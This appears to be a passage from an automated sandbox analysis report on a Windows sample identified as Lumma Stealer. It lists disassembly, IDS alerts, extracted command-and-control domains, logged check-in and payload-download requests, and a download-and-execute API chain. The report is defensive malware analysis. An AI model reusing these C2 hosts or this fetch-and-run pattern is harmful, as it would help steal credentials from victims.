                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h3_2_00B055B3
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov word ptr [ebp+00h], 0000h3_2_00B0559D
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h3_2_00B0552B
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov word ptr [eax], cx3_2_00AFC528
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edi+eax]3_2_00AF554C
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then cmp dword ptr [ecx+edi*8], 2298EE00h3_2_00B1D557
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then movzx edx, word ptr [eax]3_2_00B1D557
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then movzx edi, byte ptr [edx+eax-000000A8h]3_2_00AF6544
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov ecx, eax3_2_00B0C6C3
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]3_2_00B0A637
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov edx, eax3_2_00B07797
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then jmp ecx3_2_00B1C79B
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then movzx edi, byte ptr [edx+eax-000000BFh]3_2_00AF77E9
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov ecx, dword ptr [esi+64h]3_2_00AF87DF
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then jmp eax3_2_00B06739
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]3_2_00B0B763
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov ecx, eax3_2_00B0B763
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_00B0C8B1
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_00B13897
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then cmp word ptr [ebx+ecx], 0000h3_2_00B00817
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov ecx, eax3_2_00AF4806
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]3_2_00B0B75E
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov ecx, eax3_2_00B0B75E
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_00B0C99C
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_00B0C98D
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov edx, dword ptr [ebp-10h]3_2_00B1A9DE
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+0233DBB1h]3_2_00B089C0
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], A896961Ch3_2_00AF99D7
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 6E83E51Eh3_2_00AF99D7
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 6E83E51Eh3_2_00AF99D7
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 67F3D776h3_2_00AF99D7
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h3_2_00AF99D7
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B7C1BB11h3_2_00AF99D7
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 6E83E51Eh3_2_00AF99D7
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B430E561h3_2_00AF99D7
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov eax, edx3_2_00AFC921
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov word ptr [eax], cx3_2_00AF6907
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-78E52646h]3_2_00AE9967
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-46h]3_2_00AE9967
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+16h]3_2_00AE9967
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_00B0C94B
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [eax+ecx-3F9DFECCh]3_2_00AEEAA2
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]3_2_00AEDA09
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]3_2_00AEDA09
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov ecx, eax3_2_00AEABA7
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov edx, ecx3_2_00AEABA7
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h3_2_00B05BF7
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then movzx ecx, di3_2_00B05BF7
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+38h]3_2_00AECB7E
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov esi, eax3_2_00B03C9B
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], A269EEEFh3_2_00B16C3B
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_00B09C17
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+edx]3_2_00AFEC17
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then movsx eax, byte ptr [esi]3_2_00B1BC08
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], CAA82E26h3_2_00B1CD87
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov ecx, eax3_2_00B1AD19
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov ebp, dword ptr [eax]3_2_00B16E67
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then movzx edi, byte ptr [edx+ecx]3_2_00AEDF8C
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], E88DDEA1h3_2_00B1CFC7
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov word ptr [ebx], dx3_2_00AF8F35
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov word ptr [ebx], cx3_2_00AF8F35
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov ecx, eax3_2_00B01F77
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov word ptr [eax], dx3_2_00AF5F79

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2058223 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI) : 192.168.2.11:49727 -> 104.21.22.222:443
                  Source: Network trafficSuricata IDS: 2058214 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz) : 192.168.2.11:60070 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058222 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz) : 192.168.2.11:50695 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058226 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) : 192.168.2.11:62987 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058226 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) : 192.168.2.11:65123 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058210 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou) : 192.168.2.11:50751 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058216 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz) : 192.168.2.11:55952 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058220 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz) : 192.168.2.11:62009 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058236 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou) : 192.168.2.11:49991 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058218 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz) : 192.168.2.11:53761 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058215 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI) : 192.168.2.11:49739 -> 104.21.96.1:443
                  Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.11:49727 -> 104.21.22.222:443
                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:49727 -> 104.21.22.222:443
                  Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.11:49739 -> 104.21.96.1:443
                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:49739 -> 104.21.96.1:443
                  Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.11:49754 -> 104.102.49.254:443
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: diffuculttan.xyz
                  Source: Malware configuration extractorURLs: awake-weaves.cyou
                  Source: Malware configuration extractorURLs: wrathful-jammy.cyou
                  Source: Malware configuration extractorURLs: deafeninggeh.biz
                  Source: Malware configuration extractorURLs: debonairnukk.xyz
                  Source: Malware configuration extractorURLs: sordid-snaked.cyou
                  Source: Malware configuration extractorURLs: immureprech.biz
                  Source: Malware configuration extractorURLs: effecterectz.xyz
                  Performs DNS queries to domains with low reputation
                  Source: DNS query: effecterectz.xyz
                  Source: DNS query: diffuculttan.xyz
                  Source: DNS query: debonairnukk.xyz
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 14 Dec 2024 13:08:21 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sat, 14 Dec 2024 13:00:02 GMTETag: "58600-6293a86885370"Accept-Ranges: bytesContent-Length: 361984Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 17 cd 9e a9 53 ac f0 fa 53 ac f0 fa 53 ac f0 fa ee e3 66 fa 52 ac f0 fa 4d fe 74 fa 4d ac f0 fa 4d fe 65 fa 47 ac f0 fa 4d fe 73 fa 3d ac f0 fa 74 6a 8b fa 5a ac f0 fa 53 ac f1 fa 20 ac f0 fa 4d fe 7a fa 52 ac f0 fa 4d fe 64 fa 52 ac f0 fa 4d fe 61 fa 52 ac f0 fa 52 69 63 68 53 ac f0 fa 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 e7 de 32 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 f8 03 00 00 0e 3f 00 00 00 00 00 5c 18 00 00 00 10 00 00 00 10 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 10 43 00 00 04 00 00 9e c3 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c 29 04 00 50 00 00 00 00 10 42 00 30 f4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 04 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 6c f6 03 00 00 10 00 00 00 f8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 4c 22 00 00 00 10 04 00 00 24 00 00 00 fc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c c4 3d 00 00 40 04 00 00 70 00 00 00 20 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 30 f4 00 00 00 10 42 00 00 f6 00 00 00 90 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                  Source: Joe Sandbox ViewIP Address: 104.21.22.222 104.21.22.222
                  Source: Joe Sandbox ViewIP Address: 104.21.96.1 104.21.96.1
                  Source: Joe Sandbox ViewIP Address: 104.21.56.70 104.21.56.70
                  Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49711 -> 176.113.115.19:80
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49727 -> 104.21.22.222:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49754 -> 104.102.49.254:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49739 -> 104.21.96.1:443
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49710 -> 104.21.56.70:443
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: immureprech.biz
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: deafeninggeh.biz
                  Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_004029F4 InternetOpenW,InternetOpenUrlW,GetTempPathW,GetTempFileNameW,CreateFileW,InternetReadFile,WriteFile,CloseHandle,CloseHandle,ShellExecuteExW,WaitForSingleObject,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_004029F4
                  Source: global trafficHTTP traffic detected: GET /track_prt.php?sub=0&cc=DE HTTP/1.1User-Agent: ShareScreenHost: post-to-me.com
                  Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                  Source: global trafficHTTP traffic detected: GET /ScreenUpdateSync.exe HTTP/1.1User-Agent: ShareScreenHost: 176.113.115.19
                  Source: 3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                  Source: 3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=823712327b42f853acafd544; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35131Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveSat, 14 Dec 2024 13:08:38 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
                  Source: 3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                  Source: global trafficDNS traffic detected: DNS query: post-to-me.com
                  Source: global trafficDNS traffic detected: DNS query: sordid-snaked.cyou
                  Source: global trafficDNS traffic detected: DNS query: immureprech.biz
                  Source: global trafficDNS traffic detected: DNS query: deafeninggeh.biz
                  Source: global trafficDNS traffic detected: DNS query: effecterectz.xyz
                  Source: global trafficDNS traffic detected: DNS query: diffuculttan.xyz
                  Source: global trafficDNS traffic detected: DNS query: debonairnukk.xyz
                  Source: global trafficDNS traffic detected: DNS query: wrathful-jammy.cyou
                  Source: global trafficDNS traffic detected: DNS query: awake-weaves.cyou
                  Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                  Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: immureprech.biz
                  Source: 3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
